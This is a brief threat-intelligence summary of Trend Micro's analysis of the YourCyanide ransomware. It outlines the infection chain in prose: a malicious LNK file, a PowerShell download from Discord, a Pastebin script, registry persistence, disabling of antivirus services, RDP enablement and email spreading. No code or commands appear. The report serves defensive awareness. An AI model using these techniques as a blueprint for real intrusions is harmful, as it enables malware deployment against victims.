YourCyanide Ransomware Analysis Findings

Trend Micro shared its investigation findings after analyzing various CMD-based ransomware variants related to YourCyanide ransomware. Analysis of the ransomware has identified the incorporation of PasteBin, Discover and Microsoft document links used to download necessary payloads. Development of the YourCyanide ransomware appears to be in-progress. Trend Micro has identified the malware's infection flow arriving on hosts typically as a malicious LNK file, triggering a PowerShell command to initiate a download from Discord for the YourCyanide.exe executable that launches a CMD file downloading a script from Pastebin and creating a registry run key. The CMD file also stops various anti-virus/defense services and creates an account for persistence. For lateral movement capabilities the malware enables RDP with netsh and creates VBS files to spread itself via email.

‍